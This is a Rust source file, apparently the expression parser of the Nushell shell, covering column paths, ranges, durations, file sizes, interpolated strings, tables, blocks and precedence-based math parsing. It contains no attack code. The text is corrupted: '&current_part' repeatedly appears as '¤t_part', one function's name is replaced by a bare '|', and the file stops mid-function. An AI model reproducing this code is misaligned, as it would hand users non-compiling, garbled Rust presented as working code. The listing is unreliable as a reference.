use crate::{lex::lexer::NewlineMode, parse::def::parse_parameter};
use crate::{
lex::lexer::{lex, parse_block},
ParserScope,
};
use crate::{
lex::{
lexer::Token,
tokens::{LiteBlock, LiteCommand, LitePipeline, TokenContents},
},
parse::def::lex_split_baseline_tokens_on,
};
use self::{
def::{parse_definition, parse_definition_prototype},
util::trim_quotes,
util::verify_and_strip,
};
mod def;
mod source;
mod util;
pub use self::util::garbage;
/// Parses a simple column path, one without a variable (implied or explicit) at the head
pub fn parse_simple_column_path(
lite_arg: &Spanned<String>,
) -> (SpannedExpression, Option<ParseError>) {
let mut delimiter = '.';
let mut inside_delimiter = false;
let mut output = vec![];
let mut current_part = String::new();
let mut start_index = 0;
let mut last_index = 0;
for (idx, c) in lite_arg.item.char_indices() {
last_index = idx;
if inside_delimiter {
if c == delimiter {
inside_delimiter = false;
}
} else if c == '\'' || c == '"' {
inside_delimiter = true;
delimiter = c;
} else if c == '.' {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + idx,
);
if let Ok(row_number) = current_part.parse::<i64>() {
output.push(Member::Int(row_number, part_span));
} else {
let trimmed = trim_quotes(¤t_part);
output.push(Member::Bare(trimmed.spanned(part_span)));
}
current_part.clear();
// Note: I believe this is safe because of the delimiter we're using,
// but if we get fancy with Unicode we'll need to change this.
start_index = idx + '.'.len_utf8();
continue;
}
current_part.push(c);
}
if !current_part.is_empty() {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + last_index + 1,
);
if let Ok(row_number) = current_part.parse::<i64>() {
output.push(Member::Int(row_number, part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(Member::Bare(current_part.spanned(part_span)));
}
}
(
SpannedExpression::new(Expression::simple_column_path(output), lite_arg.span),
None,
)
}
/// Parses a column path, adding in the preceding reference to $it if it's elided
pub fn parse_full_column_path(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
let mut inside_delimiter = vec![];
let mut output = vec![];
let mut current_part = String::new();
let mut start_index = 0;
let mut last_index = 0;
let mut error = None;
let mut head = None;
for (idx, c) in lite_arg.item.char_indices() {
last_index = idx;
if c == '(' {
inside_delimiter.push(')');
} else if let Some(delimiter) = inside_delimiter.last() {
if c == *delimiter {
inside_delimiter.pop();
}
} else if c == '\'' || c == '"' {
inside_delimiter.push(c);
} else if c == '.' {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + idx,
);
if head.is_none() && current_part.starts_with('(') && current_part.ends_with(')') {
let (invoc, err) =
parse_subexpression(¤t_part.clone().spanned(part_span), scope);
if error.is_none() {
error = err;
}
head = Some(invoc.expr);
} else if head.is_none() && current_part.starts_with('$') {
// We have the variable head
head = Some(Expression::variable(current_part.clone(), part_span))
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(
UnspannedPathMember::String(current_part.clone()).into_path_member(part_span),
);
}
current_part.clear();
// Note: I believe this is safe because of the delimiter we're using,
// but if we get fancy with Unicode we'll need to change this.
start_index = idx + '.'.len_utf8();
continue;
}
current_part.push(c);
}
if !current_part.is_empty() {
let part_span = Span::new(
lite_arg.span.start() + start_index,
lite_arg.span.start() + last_index + 1,
);
if head.is_none() {
if current_part.starts_with('(') && current_part.ends_with(')') {
let (invoc, err) = parse_subexpression(¤t_part.spanned(part_span), scope);
if error.is_none() {
error = err;
}
head = Some(invoc.expr);
} else if current_part.starts_with('$') {
head = Some(Expression::variable(current_part, lite_arg.span));
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(UnspannedPathMember::String(current_part).into_path_member(part_span));
}
} else if let Ok(row_number) = current_part.parse::<i64>() {
output.push(UnspannedPathMember::Int(row_number).into_path_member(part_span));
} else {
let current_part = trim_quotes(¤t_part);
output.push(UnspannedPathMember::String(current_part).into_path_member(part_span));
}
}
if let Some(head) = head {
(
SpannedExpression::new(
Expression::path(SpannedExpression::new(head, lite_arg.span), output),
lite_arg.span,
),
error,
)
} else {
(
SpannedExpression::new(
Expression::path(
SpannedExpression::new(
Expression::variable("$it".into(), lite_arg.span),
lite_arg.span,
),
output,
),
lite_arg.span,
),
error,
)
}
}
/// Parse a numeric range
fn parse_range(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
let lite_arg_span_start = lite_arg.span.start();
let lite_arg_len = lite_arg.item.len();
let (dotdot_pos, operator_str, operator) = if let Some(pos) = lite_arg.item.find("..<") {
(pos, "..<", RangeOperator::RightExclusive)
} else if let Some(pos) = lite_arg.item.find("..") {
(pos, "..", RangeOperator::Inclusive)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
};
if lite_arg.item[0..dotdot_pos].is_empty()
&& lite_arg.item[(dotdot_pos + operator_str.len())..].is_empty()
{
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
}
let numbers: Vec<_> = lite_arg.item.split(operator_str).collect();
if numbers.len() != 2 {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lite_arg.clone())),
);
}
let right_number_offset = operator_str.len();
let lhs = numbers[0].to_string().spanned(Span::new(
lite_arg_span_start,
lite_arg_span_start + dotdot_pos,
));
let rhs = numbers[1].to_string().spanned(Span::new(
lite_arg_span_start + dotdot_pos + right_number_offset,
lite_arg_span_start + lite_arg_len,
));
let left_hand_open = dotdot_pos == 0;
let right_hand_open = dotdot_pos == lite_arg_len - right_number_offset;
let left = if left_hand_open {
None
} else if let (left, None) = parse_arg(SyntaxShape::Number, scope, &lhs) {
Some(left)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", lhs)),
);
};
let right = if right_hand_open {
None
} else if let (right, None) = parse_arg(SyntaxShape::Number, scope, &rhs) {
Some(right)
} else {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("range", rhs)),
);
};
(
SpannedExpression::new(
Expression::range(
left,
operator.spanned(Span::new(
lite_arg_span_start + dotdot_pos,
lite_arg_span_start + dotdot_pos + right_number_offset,
)),
right,
),
lite_arg.span,
),
None,
)
}
/// Parse any allowed operator, including word-based operators
fn parse_operator(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
let operator = match &lite_arg.item[..] {
"==" => Operator::Equal,
"!=" => Operator::NotEqual,
"<" => Operator::LessThan,
"<=" => Operator::LessThanOrEqual,
">" => Operator::GreaterThan,
">=" => Operator::GreaterThanOrEqual,
"=~" => Operator::Contains,
"!~" => Operator::NotContains,
"+" => Operator::Plus,
"-" => Operator::Minus,
"*" => Operator::Multiply,
"/" => Operator::Divide,
"in" => Operator::In,
"not-in" => Operator::NotIn,
"mod" => Operator::Modulo,
"&&" => Operator::And,
"||" => Operator::Or,
"**" => Operator::Pow,
_ => {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch("operator", lite_arg.clone())),
);
}
};
(
SpannedExpression::new(Expression::operator(operator), lite_arg.span),
None,
)
}
/// Parse a duration type, eg '10day'
fn parse_duration(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
fn parse_decimal_str_to_number(decimal: &str) -> Option<i64> {
let string_to_parse = format!("0.{}", decimal);
if let Ok(x) = string_to_parse.parse::<f64>() {
return Some((1_f64 / x) as i64);
}
None
}
let unit_groups = [
(Unit::Nanosecond, "NS", None),
(Unit::Microsecond, "US", Some((Unit::Nanosecond, 1000))),
(Unit::Millisecond, "MS", Some((Unit::Microsecond, 1000))),
(Unit::Second, "SEC", Some((Unit::Millisecond, 1000))),
(Unit::Minute, "MIN", Some((Unit::Second, 60))),
(Unit::Hour, "HR", Some((Unit::Minute, 60))),
(Unit::Day, "DAY", Some((Unit::Minute, 1440))),
(Unit::Week, "WK", Some((Unit::Day, 7))),
];
if let Some(unit) = unit_groups
.iter()
.find(|&x| lite_arg.to_uppercase().ends_with(x.1))
{
let mut lhs = lite_arg.item.clone();
for _ in 0..unit.1.len() {
lhs.pop();
}
let input: Vec<&str> = lhs.split('.').collect();
let (value, unit_to_use) = match &input[..] {
[number_str] => (number_str.parse::<i64>().ok(), unit.0),
[number_str, decimal_part_str] => match unit.2 {
Some(unit_to_convert_to) => match (
number_str.parse::<i64>(),
parse_decimal_str_to_number(decimal_part_str),
) {
(Ok(number), Some(decimal_part)) => (
Some(
(number * unit_to_convert_to.1) + (unit_to_convert_to.1 / decimal_part),
),
unit_to_convert_to.0,
),
_ => (None, unit.0),
},
None => (None, unit.0),
},
_ => (None, unit.0),
};
if let Some(x) = value {
let lhs_span = Span::new(lite_arg.span.start(), lite_arg.span.start() + lhs.len());
let unit_span = Span::new(lite_arg.span.start() + lhs.len(), lite_arg.span.end());
return (
SpannedExpression::new(
Expression::unit(x.spanned(lhs_span), unit_to_use.spanned(unit_span)),
lite_arg.span,
),
None,
);
}
}
(
garbage(lite_arg.span),
Some(ParseError::mismatch("duration", lite_arg.clone())),
)
}
/// Parse a unit type, eg '10kb'
fn parse_filesize(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
fn parse_decimal_str_to_number(decimal: &str) -> Option<i64> {
let string_to_parse = format!("0.{}", decimal);
if let Ok(x) = string_to_parse.parse::<f64>() {
return Some((1_f64 / x) as i64);
}
None
}
let unit_groups = [
(Unit::Kilobyte, "KB", Some((Unit::Byte, 1000))),
(Unit::Megabyte, "MB", Some((Unit::Kilobyte, 1000))),
(Unit::Gigabyte, "GB", Some((Unit::Megabyte, 1000))),
(Unit::Terabyte, "TB", Some((Unit::Gigabyte, 1000))),
(Unit::Petabyte, "PB", Some((Unit::Terabyte, 1000))),
(Unit::Kibibyte, "KIB", Some((Unit::Byte, 1024))),
(Unit::Mebibyte, "MIB", Some((Unit::Kibibyte, 1024))),
(Unit::Gibibyte, "GIB", Some((Unit::Mebibyte, 1024))),
(Unit::Tebibyte, "TIB", Some((Unit::Gibibyte, 1024))),
(Unit::Pebibyte, "PIB", Some((Unit::Tebibyte, 1024))),
(Unit::Byte, "B", None),
];
if let Some(unit) = unit_groups
.iter()
.find(|&x| lite_arg.to_uppercase().ends_with(x.1))
{
let mut lhs = lite_arg.item.clone();
for _ in 0..unit.1.len() {
lhs.pop();
}
let input: Vec<&str> = lhs.split('.').collect();
let (value, unit_to_use) = match &input[..] {
[number_str] => (number_str.parse::<i64>().ok(), unit.0),
[number_str, decimal_part_str] => match unit.2 {
Some(unit_to_convert_to) => match (
number_str.parse::<i64>(),
parse_decimal_str_to_number(decimal_part_str),
) {
(Ok(number), Some(decimal_part)) => (
Some(
(number * unit_to_convert_to.1) + (unit_to_convert_to.1 / decimal_part),
),
unit_to_convert_to.0,
),
_ => (None, unit.0),
},
None => (None, unit.0),
},
_ => (None, unit.0),
};
if let Some(x) = value {
let lhs_span = Span::new(lite_arg.span.start(), lite_arg.span.start() + lhs.len());
let unit_span = Span::new(lite_arg.span.start() + lhs.len(), lite_arg.span.end());
return (
SpannedExpression::new(
Expression::unit(x.spanned(lhs_span), unit_to_use.spanned(unit_span)),
lite_arg.span,
),
None,
);
}
}
(
garbage(lite_arg.span),
Some(ParseError::mismatch("unit", lite_arg.clone())),
)
}
fn parse_subexpression(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
let mut error = None;
let string: String = lite_arg
.item
.chars()
.skip(1)
.take(lite_arg.item.chars().count() - 2)
.collect();
// We haven't done much with the inner string, so let's go ahead and work with it
let (tokens, err) = lex(&string, lite_arg.span.start() + 1, NewlineMode::Whitespace);
if error.is_none() {
error = err;
};
let (lite_block, err) = parse_block(tokens);
if error.is_none() {
error = err;
};
scope.enter_scope();
let (classified_block, err) = classify_block(&lite_block, scope);
if error.is_none() {
error = err;
};
scope.exit_scope();
(
SpannedExpression::new(Expression::Subexpression(classified_block), lite_arg.span),
error,
)
}
fn parse_variable(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
if lite_arg.item == "$it" {
trace!("parsing $it");
parse_full_column_path(lite_arg, scope)
} else {
(
SpannedExpression::new(
Expression::variable(lite_arg.item.clone(), lite_arg.span),
lite_arg.span,
),
None,
)
}
}
/// Parses the given lite_arg starting with dollar returning
/// a expression starting with $
/// Currently either Variable, String interpolation, FullColumnPath
fn parse_dollar_expr(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
trace!("Parsing dollar expression: {:?}", lite_arg.item);
if (lite_arg.item.starts_with("$\"") && lite_arg.item.len() > 1 && lite_arg.item.ends_with('"'))
|| (lite_arg.item.starts_with("$'")
&& lite_arg.item.len() > 1
&& lite_arg.item.ends_with('\''))
{
// This is an interpolated string
parse_interpolated_string(lite_arg, scope)
} else if let (expr, None) = parse_range(lite_arg, scope) {
(expr, None)
} else if let (expr, None) = parse_full_column_path(lite_arg, scope) {
(expr, None)
} else {
parse_variable(lite_arg, scope)
}
}
#[derive(Debug)]
enum FormatCommand {
Text(Spanned<String>),
Column(Spanned<String>),
}
fn | (input: &str, start: usize) -> (Vec<FormatCommand>, Option<ParseError>) {
let original_start = start;
let mut output = vec![];
let mut error = None;
let mut loop_input = input.chars().peekable();
let mut start = start;
let mut end = start;
loop {
let mut before = String::new();
loop {
end += 1;
if let Some(c) = loop_input.next() {
if c == '(' {
break;
}
before.push(c);
} else {
break;
}
}
if !before.is_empty() {
output.push(FormatCommand::Text(
before.to_string().spanned(Span::new(start, end - 1)),
));
}
// Look for column as we're now at one
let mut column = String::new();
start = end;
let mut found_end = false;
let mut delimiter_stack = vec![')'];
for c in &mut loop_input {
end += 1;
if let Some('\'') = delimiter_stack.last() {
if c == '\'' {
delimiter_stack.pop();
}
} else if let Some('"') = delimiter_stack.last() {
if c == '"' {
delimiter_stack.pop();
}
} else if c == '\'' {
delimiter_stack.push('\'');
} else if c == '"' {
delimiter_stack.push('"');
} else if c == '(' {
delimiter_stack.push(')');
} else if c == ')' {
if let Some(')') = delimiter_stack.last() {
delimiter_stack.pop();
}
if delimiter_stack.is_empty() {
found_end = true;
break;
}
}
column.push(c);
}
if !column.is_empty() {
output.push(FormatCommand::Column(
column.to_string().spanned(Span::new(start, end)),
));
}
if column.is_empty() {
break;
}
if !found_end {
error = Some(ParseError::argument_error(
input.spanned(Span::new(original_start, end)),
ArgumentError::MissingValueForName("unclosed ()".to_string()),
));
}
start = end;
}
(output, error)
}
/// Parses an interpolated string, one that has expressions inside of it
fn parse_interpolated_string(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
trace!("Parse_interpolated_string");
let string_len = lite_arg.item.chars().count();
let inner_string = lite_arg
.item
.chars()
.skip(2)
.take(string_len - 3)
.collect::<String>();
let mut error = None;
let (format_result, err) = format(&inner_string, lite_arg.span.start() + 2);
if error.is_none() {
error = err;
}
let mut output = vec![];
for f in format_result {
match f {
FormatCommand::Text(t) => {
output.push(SpannedExpression {
expr: Expression::Literal(hir::Literal::String(t.item)),
span: t.span,
});
}
FormatCommand::Column(c) => {
let result = parse(&c, c.span.start(), scope);
match result {
(classified_block, None) => {
output.push(SpannedExpression {
expr: Expression::Subexpression(classified_block),
span: c.span,
});
}
(_, Some(err)) => {
return (garbage(c.span), Some(err));
}
}
}
}
}
let pipelines = vec![Pipeline {
span: lite_arg.span,
list: vec![ClassifiedCommand::Internal(InternalCommand {
name: "build-string".to_owned(),
name_span: lite_arg.span,
args: hir::Call {
head: Box::new(SpannedExpression {
expr: Expression::Synthetic(hir::Synthetic::String("build-string".to_owned())),
span: lite_arg.span,
}),
external_redirection: ExternalRedirection::Stdout,
named: None,
positional: Some(output),
span: lite_arg.span,
},
})],
}];
let group = Group::new(pipelines, lite_arg.span);
let call = SpannedExpression {
expr: Expression::Subexpression(Arc::new(Block::new(
Signature::new("<subexpression>"),
vec![group],
IndexMap::new(),
lite_arg.span,
))),
span: lite_arg.span,
};
(call, error)
}
/// Parses the given argument using the shape as a guide for how to correctly parse the argument
fn parse_external_arg(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (SpannedExpression, Option<ParseError>) {
if lite_arg.item.starts_with('$') {
parse_dollar_expr(lite_arg, scope)
} else if lite_arg.item.starts_with('(') {
parse_full_column_path(lite_arg, scope)
} else {
(
SpannedExpression::new(Expression::string(lite_arg.item.clone()), lite_arg.span),
None,
)
}
}
fn parse_list(
lite_block: &LiteBlock,
scope: &dyn ParserScope,
) -> (Vec<SpannedExpression>, Option<ParseError>) {
let mut error = None;
if lite_block.block.is_empty() {
return (vec![], None);
}
let lite_pipeline = &lite_block.block[0];
let mut output = vec![];
for lite_pipeline in &lite_pipeline.pipelines {
for lite_inner in &lite_pipeline.commands {
for part in &lite_inner.parts {
let item = if part.ends_with(',') {
let mut str: String = part.item.clone();
str.pop();
str.spanned(Span::new(part.span.start(), part.span.end() - 1))
} else {
part.clone()
};
let (part, err) = parse_arg(SyntaxShape::Any, scope, &item);
output.push(part);
if error.is_none() {
error = err;
}
}
}
}
(output, error)
}
fn parse_table(
lite_block: &LiteBlock,
scope: &dyn ParserScope,
span: Span,
) -> (SpannedExpression, Option<ParseError>) {
let mut error = None;
let mut output = vec![];
// Header
let lite_group = &lite_block.block[0];
let lite_pipeline = &lite_group.pipelines[0];
let lite_inner = &lite_pipeline.commands[0];
let (string, err) = verify_and_strip(&lite_inner.parts[0], '[', ']');
if error.is_none() {
error = err;
}
let (tokens, err) = lex(
&string,
lite_inner.parts[0].span.start() + 1,
NewlineMode::Whitespace,
);
if err.is_some() {
return (garbage(lite_inner.span()), err);
}
let (lite_header, err) = parse_block(tokens);
if err.is_some() {
return (garbage(lite_inner.span()), err);
}
let (headers, err) = parse_list(&lite_header, scope);
if error.is_none() {
error = err;
}
// Cells
let lite_rows = &lite_group.pipelines[1];
let lite_cells = &lite_rows.commands[0];
for arg in &lite_cells.parts {
let (string, err) = verify_and_strip(arg, '[', ']');
if error.is_none() {
error = err;
}
let (tokens, err) = lex(&string, arg.span.start() + 1, NewlineMode::Whitespace);
if err.is_some() {
return (garbage(arg.span), err);
}
let (lite_cell, err) = parse_block(tokens);
if err.is_some() {
return (garbage(arg.span), err);
}
let (inner_cell, err) = parse_list(&lite_cell, scope);
if error.is_none() {
error = err;
}
output.push(inner_cell);
}
(
SpannedExpression::new(Expression::Table(headers, output), span),
error,
)
}
fn parse_int(lite_arg: &Spanned<String>) -> (SpannedExpression, Option<ParseError>) {
if lite_arg.item.starts_with("0x") {
if let Ok(v) = i64::from_str_radix(&lite_arg.item[2..], 16) {
(
SpannedExpression::new(Expression::integer(v), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("int", lite_arg.clone())),
)
}
} else if lite_arg.item.starts_with("0b") {
if let Ok(v) = i64::from_str_radix(&lite_arg.item[2..], 2) {
(
SpannedExpression::new(Expression::integer(v), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("int", lite_arg.clone())),
)
}
} else if lite_arg.item.starts_with("0o") {
if let Ok(v) = i64::from_str_radix(&lite_arg.item[2..], 8) {
(
SpannedExpression::new(Expression::integer(v), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("int", lite_arg.clone())),
)
}
} else if let Ok(x) = lite_arg.item.parse::<i64>() {
(
SpannedExpression::new(Expression::integer(x), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("int", lite_arg.clone())),
)
}
}
/// Parses the given argument using the shape as a guide for how to correctly parse the argument
fn parse_arg(
expected_type: SyntaxShape,
scope: &dyn ParserScope,
lite_arg: &Spanned<String>,
) -> (SpannedExpression, Option<ParseError>) {
if lite_arg.item.starts_with('$') {
return parse_dollar_expr(lite_arg, scope);
}
// before anything else, try to see if this is a number in paranthesis
if lite_arg.item.starts_with('(') {
return parse_full_column_path(lite_arg, scope);
}
match expected_type {
SyntaxShape::Number => {
if let (x, None) = parse_int(lite_arg) {
(x, None)
} else if let Ok(x) = lite_arg.item.parse::<BigInt>() {
(
SpannedExpression::new(Expression::big_integer(x), lite_arg.span),
None,
)
} else if let Ok(x) = lite_arg.item.parse::<BigDecimal>() {
(
SpannedExpression::new(Expression::decimal(x), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("number", lite_arg.clone())),
)
}
}
SyntaxShape::Int => {
if let Ok(x) = lite_arg.item.parse::<i64>() {
(
SpannedExpression::new(Expression::integer(x), lite_arg.span),
None,
)
} else if let Ok(x) = lite_arg.item.parse::<BigInt>() {
(
SpannedExpression::new(Expression::big_integer(x), lite_arg.span),
None,
)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch("int", lite_arg.clone())),
)
}
}
SyntaxShape::String => {
let trimmed = trim_quotes(&lite_arg.item);
(
SpannedExpression::new(Expression::string(trimmed), lite_arg.span),
None,
)
}
SyntaxShape::GlobPattern => {
let trimmed = trim_quotes(&lite_arg.item);
let expanded = expand_path(trimmed).to_string_lossy().to_string();
(
SpannedExpression::new(Expression::glob_pattern(expanded), lite_arg.span),
None,
)
}
SyntaxShape::Range => parse_range(lite_arg, scope),
SyntaxShape::Operator => (
garbage(lite_arg.span),
Some(ParseError::mismatch("operator", lite_arg.clone())),
),
SyntaxShape::Filesize => parse_filesize(lite_arg),
SyntaxShape::Duration => parse_duration(lite_arg),
SyntaxShape::FilePath => {
let trimmed = trim_quotes(&lite_arg.item);
let path = PathBuf::from(trimmed);
let expanded = expand_path(path);
(
SpannedExpression::new(Expression::FilePath(expanded), lite_arg.span),
None,
)
}
SyntaxShape::ColumnPath => parse_simple_column_path(lite_arg),
SyntaxShape::FullColumnPath => parse_full_column_path(lite_arg, scope),
SyntaxShape::Any => {
let shapes = vec![
SyntaxShape::Int,
SyntaxShape::Number,
SyntaxShape::Range,
SyntaxShape::Filesize,
SyntaxShape::Duration,
SyntaxShape::Block,
SyntaxShape::Table,
SyntaxShape::String,
];
for shape in shapes.iter() {
if let (s, None) = parse_arg(*shape, scope, lite_arg) {
return (s, None);
}
}
(
garbage(lite_arg.span),
Some(ParseError::mismatch("any shape", lite_arg.clone())),
)
}
SyntaxShape::Table => {
let mut chars = lite_arg.item.chars();
match (chars.next(), chars.next_back()) {
(Some('['), Some(']')) => {
// We have a literal row
let string: String = chars.collect();
// We haven't done much with the inner string, so let's go ahead and work with it
let (tokens, err) =
lex(&string, lite_arg.span.start() + 1, NewlineMode::Whitespace);
if err.is_some() {
return (garbage(lite_arg.span), err);
}
let (lite_block, err) = parse_block(tokens);
if err.is_some() {
return (garbage(lite_arg.span), err);
}
let lite_groups = &lite_block.block;
if lite_groups.is_empty() {
return (
SpannedExpression::new(Expression::List(vec![]), lite_arg.span),
None,
);
}
if lite_groups[0].pipelines.len() == 1 {
let (items, err) = parse_list(&lite_block, scope);
(
SpannedExpression::new(Expression::List(items), lite_arg.span),
err,
)
} else if lite_groups[0].pipelines.len() == 2 {
parse_table(&lite_block, scope, lite_arg.span)
} else {
(
garbage(lite_arg.span),
Some(ParseError::mismatch(
"list or table",
"unknown".to_string().spanned(lite_arg.span),
)),
)
}
}
_ => (
garbage(lite_arg.span),
Some(ParseError::mismatch("table", lite_arg.clone())),
),
}
}
SyntaxShape::MathExpression => parse_arg(SyntaxShape::Any, scope, lite_arg),
SyntaxShape::Block | SyntaxShape::RowCondition => {
// Blocks have one of two forms: the literal block and the implied block
// To parse a literal block, we need to detect that what we have is itself a block
let mut chars: Vec<_> = lite_arg.item.chars().collect();
match chars.first() {
Some('{') => {
let mut error = None;
if let Some('}') = chars.last() {
chars = chars[1..(chars.len() - 1)].to_vec();
} else {
chars = chars[1..].to_vec();
error = Some(ParseError::unclosed(
"}".into(),
Span::new(lite_arg.span.end(), lite_arg.span.end()),
));
}
// We have a literal block
let string: String = chars.into_iter().collect();
// We haven't done much with the inner string, so let's go ahead and work with it
let (mut tokens, err) =
lex(&string, lite_arg.span.start() + 1, NewlineMode::Normal);
if error.is_none() {
error = err;
}
// Check to see if we have parameters
let params = if matches!(
tokens.first(),
Some(Token {
contents: TokenContents::Pipe,
..
})
) {
// We've found a parameter list
let mut param_tokens = vec![];
let mut token_iter = tokens.into_iter().skip(1);
for token in &mut token_iter {
if matches!(
token,
Token {
contents: TokenContents::Pipe,
..
}
) {
break;
} else {
param_tokens.push(token);
}
}
let split_tokens =
lex_split_baseline_tokens_on(param_tokens, &[',', ':', '?']);
let mut i = 0;
let mut params = vec![];
while i < split_tokens.len() {
let (parameter, advance_by, error) =
parse_parameter(&split_tokens[i..], split_tokens[i].span);
if error.is_some() {
return (garbage(lite_arg.span), error);
}
i += advance_by;
params.push(parameter);
}
tokens = token_iter.collect();
if tokens.is_empty() {
return (
garbage(lite_arg.span),
Some(ParseError::mismatch(
"block with parameters",
lite_arg.clone(),
)),
);
}
params
} else {
vec![]
};
let (lite_block, err) = parse_block(tokens);
if error.is_none() {
error = err;
}
scope.enter_scope();
let (mut classified_block, err) = classify_block(&lite_block, scope);
if error.is_none() {
error = err;
}
scope.exit_scope();
if let Some(classified_block) = Arc::get_mut(&mut classified_block) {
classified_block.span = lite_arg.span;
if !params.is_empty() {
classified_block.params.positional.clear();
for param in params {
classified_block
.params
.positional
.push((param.pos_type, param.desc.unwrap_or_default()));
}
}
}
(
SpannedExpression::new(Expression::Block(classified_block), lite_arg.span),
error,
)
}
_ => {
// We have an implied block, but we can't parse this here
// it needed to have been parsed up higher where we have control over more than one arg
(
garbage(lite_arg.span),
Some(ParseError::mismatch("block", lite_arg.clone())),
)
}
}
}
}
}
/// This is a bit of a "fix-up" of previously parsed areas. In cases where we're in shorthand mode (eg in the `where` command), we need
/// to use the original source to parse a column path. Without it, we'll lose a little too much information to parse it correctly. As we'll
/// only know we were on the left-hand side of an expression after we do the full math parse, we need to do this step after rather than during
/// the initial parse.
fn shorthand_reparse(
left: SpannedExpression,
orig_left: Option<Spanned<String>>,
scope: &dyn ParserScope,
shorthand_mode: bool,
) -> (SpannedExpression, Option<ParseError>) {
// If we're in shorthand mode, we need to reparse the left-hand side if possible
if shorthand_mode {
if let Some(orig_left) = orig_left {
parse_arg(SyntaxShape::FullColumnPath, scope, &orig_left)
} else {
(left, None)
}
} else {
(left, None)
}
}
fn parse_possibly_parenthesized(
lite_arg: &Spanned<String>,
scope: &dyn ParserScope,
) -> (
(Option<Spanned<String>>, SpannedExpression),
Option<ParseError>,
) {
let (lhs, err) = parse_arg(SyntaxShape::Any, scope, lite_arg);
((Some(lite_arg.clone()), lhs), err)
}
/// Handle parsing math expressions, complete with working with the precedence of the operators
pub fn parse_math_expression(
incoming_idx: usize,
lite_args: &[Spanned<String>],
scope: &dyn ParserScope,
shorthand_mode: bool,
) -> (usize, SpannedExpression, Option<ParseError>) {
// Precedence parsing is included
// shorthand_mode means that the left-hand side of an expression can point to a column-path.
// To make this possible, we parse as normal, but then go back and when we detect a
// left-hand side, reparse that value if it's a string
let mut idx = 0;
let mut error = None;
let mut working_exprs = vec![];
let mut prec = vec![];
let (lhs_working_expr, err) = parse_possibly_parenthesized(&lite_args[idx], scope);
if error.is_none() {
error = err;
}
working_exprs.push(lhs_working_expr);
idx += 1;
prec.push(0);
while idx < lite_args.len() {
let (op, err) = parse_operator(&lite_args[idx]);
if error.is_none() {
error = err;
}
idx += 1;
if idx == lite_args.len() {
if error.is_none() {
error = Some(ParseError::argument_error(
lite_args[idx - 1].clone(),
ArgumentError::MissingMandatoryPositional("right hand side".into()),
));
}
working_exprs.push((None, garbage(op.span)));
working_exprs.push((None, garbage(op.span)));
prec.push(0);
break;
}
trace!(
"idx: {} working_exprs: {:#?} prec: {:?}",
idx,
working_exprs,
prec
);
let (rhs_working_expr, err) = parse_possibly_parenthesized(&lite_args[idx], scope);
if error.is_none() {
error = err;
}
let next_prec = op.precedence();
if !prec.is_empty() && next_prec > *prec.last().expect("this shouldn't happen") {
prec.push(next_prec);
working_exprs.push((None, op));
working_exprs.push(rhs_working_expr);
idx += 1;
continue;
}
while !prec.is_empty()
&& *prec.last().expect("This shouldn't happen") >= next_prec
&& next_prec > 0 // Not garbage
&& working_exprs.len() >= 3
{
// Pop 3 and create and expression, push and repeat
trace!(
"idx: {} working_exprs: {:#?} prec: {:?}",
idx,
working_exprs,
prec
);
let (_, right) = working_exprs.pop().expect("This shouldn't be possible");
let (_, op) = working_exprs.pop().expect("This shouldn't be possible");
let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");
// If we're in shorthand mode, we need to reparse the left-hand side if possible
let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
if error.is_none() {
error = err;
}
let span = Span::new(left.span.start(), right.span.end());
working_exprs.push((
None,
SpannedExpression {
expr: Expression::Binary(Box::new(Binary { left, op, right })),
span,
},
));
prec.pop();
}
working_exprs.push((None, op));
working_exprs.push(rhs_working_expr);
prec.push(next_prec);
idx += 1;
}
while working_exprs.len() >= 3 {
// Pop 3 and create and expression, push and repeat
let (_, right) = working_exprs.pop().expect("This shouldn't be possible");
let (_, op) = working_exprs.pop().expect("This shouldn't be possible");
let (orig_left, left) = working_exprs.pop().expect("This shouldn't be possible");
let (left, err) = shorthand_reparse(left, orig_left, scope, shorthand_mode);
if error.is_none() {
error = err;
}
let span = Span::new(left.span.start(), right.span.end());
working_exprs.push((
None,
SpannedExpression {
expr: Expression::Binary(Box::new(Binary { left, op, right })),
span,
},
));
}
